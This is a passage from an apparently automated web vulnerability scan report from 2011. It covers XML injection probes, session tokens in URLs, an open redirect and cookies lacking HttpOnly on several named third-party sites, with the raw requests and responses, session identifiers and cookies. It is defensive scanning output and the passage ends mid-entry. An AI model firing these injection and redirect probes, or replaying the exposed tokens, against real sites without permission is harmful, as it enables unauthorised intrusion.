Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:38:08 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1844


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.14. http://amch.questionmarket.com/surveyf/nav.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /surveyf/nav.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /surveyf/nav.php]]>>?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A%2F%2Fwww.delish.com%2Fsearch%2Ffast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://amch.questionmarket.com/surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 14:38:10 GMT
Server: Apache/2.2.3
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1844


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...

9.15. http://cdn.slidesharecdn.com/profile-photo-MillwardBrown-48x48 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.slidesharecdn.com
Path:   /profile-photo-MillwardBrown-48x48

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /profile-photo-MillwardBrown-48x48]]>>?1295624731 HTTP/1.1
Host: cdn.slidesharecdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 69D7660134B768E8
x-amz-id-2: ojYSUPDanvTXEw0kYKYDT9w8UV0c2U3P6N58YspVhfafM8vpUPPkKp1XCNQxNBWt
Content-Type: application/xml
Server: AmazonS3
Date: Sat, 17 Sep 2011 14:45:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>69D7660134B768E8</RequestId><HostId>ojYSUPDanvTXEw0kYKYDT9w8UV0c2U3P6N58YspVhfafM8vpUP
...[SNIP]...

9.16. http://cdn.slidesharecdn.com/profile-photo-MillwardBrownFrance-48x48 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn.slidesharecdn.com
Path:   /profile-photo-MillwardBrownFrance-48x48

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /profile-photo-MillwardBrownFrance-48x48]]>>?1297938293 HTTP/1.1
Host: cdn.slidesharecdn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.slideshare.net/MillwardBrown/value-of-a-fan

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: A229F99A083A8322
x-amz-id-2: Ldr2snZLe0Hzp6AmBEH9g62UPHv2MDB5hY9kQSKU1Nn41OfB8kWTir30PI7xLxDG
Content-Type: application/xml
Server: AmazonS3
Date: Sat, 17 Sep 2011 14:46:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A229F99A083A8322</RequestId><HostId>Ldr2snZLe0Hzp6AmBEH9g62UPHv2MDB5hY9kQSKU1Nn41OfB8k
...[SNIP]...

10. Session token in URL  previous  next
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://www.peopleschoice.com/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:09:55 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Last-Modified: Mon, 12 Sep 2011 05:16:22 GMT
Cache-control: max-age=86400
Expires: Sun, 18 Sep 2011 13:09:55 GMT
Content-Type: text/css;charset=ISO-8859-1
Content-Length: 86640
Via: 1.1 pca-www-02.sparkred.com
Connection: close

.rich-color-picker-wrapper{display:none;overflow:hidden;position:absolute;width:350px;z-index:3;}.rich-color-picker-ext{border:1px solid;position:relative;height:170px;padding:0;margin:0;}.rich-color-
...[SNIP]...

10.2. http://www.peopleschoice.com/pca/img/pca_poll_bargold_logo.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /pca/img/pca_poll_bargold_logo.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:10:47 GMT
Server: Apache
Last-Modified: Thu, 08 Sep 2011 06:48:07 GMT
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
ETag: W/"354-1315464487000"
Content-Length: 354
Via: 1.1 pca-www-02.sparkred.com
Cache-Control: max-age=2764800, public
Expires: Wed, 19 Oct 2011 13:04:09 GMT
Age: 398
Connection: close
Content-Type: image/png

.PNG
.
...IHDR..............j.    ....tEXtSoftware.Adobe ImageReadyq.e<...*PLTE..;..GSH...X..0..n.p............].....u......Q....tRNS..............E.......IDATx.\.Q.. ...    >..._..:......A.........R6....
...[SNIP]...

10.3. http://www.peopleschoice.com/pca/img/pca_small_email.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /pca/img/pca_small_email.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://www.peopleschoice.com/pca/polls/poll.jsp?pollId=1000000270
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:10:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
ETag: W/"175-1315464483000"
Last-Modified: Thu, 08 Sep 2011 06:48:03 GMT
Content-Type: image/png
Content-Length: 175
Via: 1.1 pca-www-02.sparkred.com
Cache-Control: max-age=2764800, public
Expires: Wed, 19 Oct 2011 13:10:39 GMT
Connection: close

.PNG
.
...IHDR.......
.............tEXtSoftware.Adobe ImageReadyq.e<...    PLTE...yyyzzz..|$...<IDATx.T....@.B.......f.0.(.    ......%...14..]..tO.G....aGO......O5,.)....IEND.B`.

10.4. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:03 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; Path=/
Via: 1.1 pca-www-02.sparkred.com
Vary: Accept-Encoding
Content-Length: 27744
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...
</script><link class="component" href="/pca/a4j/s/3_3_3.Final/org/richfaces/skin.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" rel="stylesheet" type="text/css" /><script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js">
...[SNIP]...
</div><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272&amp;cid=213917" id="j_id87" class="pca-next-commment">Next Poll</a>
...[SNIP]...
<div id="j_id99:3:j_id148" class="pca-latest-results-totals" style="right: 47%; z-index: 65;">
           &nbsp;53%&nbsp;<img src="/pca/img/pca_poll_bargold_logo.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" alt="" height="16" style="border:0px !important;" width="16" />&nbsp;</div>
...[SNIP]...
</a>
               &nbsp;&nbsp;<a href="/pca/emailfriend.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?src=/polls/poll.jsp%3FpollId=1000000270&pollId=1000000270"><img src="/pca/img/pca_small_email.png;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2" alt="Email" /></a>
...[SNIP]...
</div><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268&amp;cid=213917" id="j_id267" class="pca-prev-commment">Previous Poll</a><a href="/pca/polls/poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272&amp;cid=213917" id="j_id270" class="pca-next-commment">Next Poll</a>
...[SNIP]...
<p><a id="j_id278:0:link1" name="j_id278:0:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000274" style="color: #5a5a5a;">Disney classic <i>
...[SNIP]...
<p><a id="j_id278:1:link1" name="j_id278:1:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000272" style="color: #5a5a5a;">Javier Colon, winner of NBC's <i>
...[SNIP]...
<p><a id="j_id278:2:link1" name="j_id278:2:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000270" style="color: #5a5a5a;"><i>
...[SNIP]...
<p><a id="j_id278:3:link1" name="j_id278:3:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000268" style="color: #5a5a5a;">1991 cult favorite <i>
...[SNIP]...
<p><a id="j_id278:4:link1" name="j_id278:4:link1" href="poll.jsp;jsessionid=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2?pollId=1000000267" style="color: #5a5a5a;">Gosling and Marsden faceoff again! Which of the films out this weekend, two of which star the leading men from <i>
...[SNIP]...

11. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /surveyf/

Issue detail

The value of the link request parameter is used to perform an HTTP redirect. The payload http%3a//acbbbf0ad7361ec26/a%3fhttp%3a//www.delish.com/search/fast_search_recipes%3fsearch_term%3dxss%20sugar%20cake%26 was submitted in the link parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /surveyf/?survey_server=survey.questionmarket.com&survey_num=913131&site=10&code=922738&lang=&frame=&dl_logo=&invite=no&link=http%3a//acbbbf0ad7361ec26/a%3fhttp%3a//www.delish.com/search/fast_search_recipes%3fsearch_term%3dxss%20sugar%20cake%26&orig=http%3A//www.delish.com/search/fast_search_recipes%3Fsearch_term%3Dxss+sugar+cake%26 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.delish.com/search/fast_search_recipes?search_term=xss+sugar+cake&
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; linkjumptest=1; endsurvey=no; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270041

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 14:42:58 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://amch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://acbbbf0ad7361ec26/a?http://www.delish.com/search/fast_search_recipes?search_term=xss sugar cake&
Content-Length: 0
Content-Type: text/html


12. Cookie without HttpOnly flag set  previous  next
There are 37 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



12.1. http://blekko.com/a/favicon  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /a/favicon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/favicon?d=1&h=www.forbes.com HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/wpp+companies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316288660893

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:13 GMT
Content-Type: image/png
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: sessionid=559518085; path=/; expires=Sat, 17 Sep 2011 18:43:13 GMT
Cache-Control: max-age=28800
Expires: Sat, 17 Sep 2011 22:43:13 GMT
Vary: Accept-Encoding
Content-Length: 301
X-Blekko-PT: 7ca327c7be6a9864b29b192f5de0bcd9

.PNG
.
...IHDR...............ex...lPLTE............................................................................................................M.[....|IDAT.....a.@..0..*3....;V.$k....6.d.V.>....
...[SNIP]...

12.2. http://blekko.com/a/track  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /a/track

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a/track?t=l&l=loc%3Dhttp%3A%2F%2Fblekko.com%2Fws%2Fwpp%2Bcompanies%3Bv_l%3D1%3Bv_ul%3D0%3B&s=1316288666565&i=undefined&y=0 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/wpp+companies
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316288660893

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=15
Set-Cookie: sessionid=996256394; path=/; expires=Sat, 17 Sep 2011 18:43:16 GMT
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 0
X-Blekko-PT: 4cd8d7c9b015bfbcb9f99a206cddf5a0


12.3. http://blekko.com/autocomplete  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /autocomplete?query=wpp HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=3; t=1316220316418

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 14:43:08 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Set-Cookie: sessionid=830337972; path=/; expires=Sat, 17 Sep 2011 18:43:08 GMT
Cache-Control: max-age=43200
Expires: Sun, 18 Sep 2011 02:43:08 GMT
Vary: Accept-Encoding
X-Blekko-PT: 855aaf303f14a0aa9fc97c82869447c8
Content-Length: 185

{"suggestions":["wpp","wpp /techblogs","wpp /news-magazine","wpp /tech","wppi","wpp group","wpp group /news-magazine","wpp group /techblogs","wpp group /reviews","wppsi"],"query":"wpp"}

12.4. http://www.peopleschoice.com/pca/polls/poll.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.peopleschoice.com
Path:   /pca/polls/poll.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pca/polls/poll.jsp?pollId=1000000270 HTTP/1.1
Host: www.peopleschoice.com
Proxy-Connection: keep-alive
Referer: http://wonderwall.msn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 13:04:03 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=09AC202AB04C32C56526BA77B8BB9CEA.app-01-prd2; Path=/
Via: 1.1 pca-www-02.sparkred.com
Vary: Accept-Encoding
Content-Length: 27744
Connection: close

<!DOCTYPE composition PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebo
...[SNIP]...

12.5. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=nissan.dfa&inv=doubleclick&rnd=1316283170160&esc=0&CustomQuery=dcp%3Domd%26oem%3Dnissan%26eaid%3D242388130%26epid%3D61484958%26esid%3D598068%26ecid%3D43899957%26campId%3D5290464%26model%3DAS%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221548509_135234331_as3100_vew|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316265127233_137611811_as3107_imp|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 13:12:07 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 13:12:06 GMT
Content-Length: 3406

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316265127233_137611811_as3107_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316265127233_137611811_as3
...[SNIP]...

12.6. http://adserver.teracent.net/tase/redir/1316265127233_137611811_as3107_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316265127233_137611811_as3107_imp/vew

Issue detail

